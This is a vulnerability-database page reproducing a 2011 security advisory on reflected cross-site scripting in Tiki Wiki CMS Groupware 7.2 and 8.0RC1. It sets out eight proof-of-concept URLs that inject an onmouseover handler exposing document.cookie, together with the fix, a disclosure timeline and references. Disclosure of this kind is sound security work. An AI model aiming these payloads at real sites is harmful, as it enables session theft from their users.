Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Tiki Wiki CMS Groupware Cross Site Scripting

🗓️ 17 Nov 2011 00:00:00Reported by Stefan SchurtzType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 48 Views

Tiki Wiki CMS Groupware Multiple XSS vulnerabilities in Tiki 6, 7, and 8.0RC1

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2011-4454
23 Feb 202421:17
circl
Circl		CVE-2011-4455
23 Feb 202421:17
circl
CVE		CVE-2011-4454
20 Nov 201918:57
cve
CVE		CVE-2011-4455
20 Nov 201918:57
cve
Cvelist		CVE-2011-4454
20 Nov 201918:57
cvelist
Cvelist		CVE-2011-4455
20 Nov 201918:57
cvelist
EUVD		EUVD-2011-4383
7 Oct 202500:30
euvd
EUVD		EUVD-2011-4384
7 Oct 202500:30
euvd
NVD		CVE-2011-4454
20 Nov 201919:15
nvd
NVD		CVE-2011-4455
20 Nov 201919:15
nvd
Rows per page
`Advisory: Tiki Wiki CMS Groupware Multiple XSS vulnerabilities  
Advisory ID: INFOSERVE-ADV2011-01  
Author: Stefan Schurtz  
Contact: [email protected]  
Affected Software: Successfully tested on Tiki 7.2 & 8.0 RC1  
Vendor URL: http://info.tiki.org/  
Vendor Status: fixed for Tiki 7 (New Tiki 6 LTS release in progress)  
CVE-ID: CVE-2011-4454, CVE-2011-4455  
  
==========================  
Vulnerability Description  
==========================  
  
All versions of Tiki 6 and Tiki 7 and version Tiki 8.0RC1 are prone to multiple XSS vulnerabilities  
  
==================  
PoC-Exploit  
==================  
  
8.0RC1  
  
http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-8.0.RC1/tiki-index.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)"  
  
7.2  
  
http://<target>/tiki-7.2/tiki-admin_system.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-7.2/tiki-pagehistory.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-7.2/tiki-removepage.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-7.2/tiki-rename_page.php/" onmouseover="alert(document.cookie)"  
  
=========  
Solution  
=========  
  
Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x)  
  
====================  
Disclosure Timeline  
====================  
  
02-Nov-2011 - informed Security Team ([email protected])  
03-Nov-2011 - feedback from vendor  
11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x)  
  
========  
Credits  
========  
  
Vulnerabilities found and advisory written by the INFOSERVE Security Team  
  
===========  
References  
===========  
  
http://info.tiki.org/  
http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1  
http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x  
http://secunia.com/advisories/46740  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Nov 2011 00:00Current
EPSS0.00313
tiki wikicms groupwarecross site scriptinginfoservestefan schurtzcve-2011-4454cve-2011-4455upgrade 8.1end-of-lifesecurity teamvulnerability disclosurereference links
48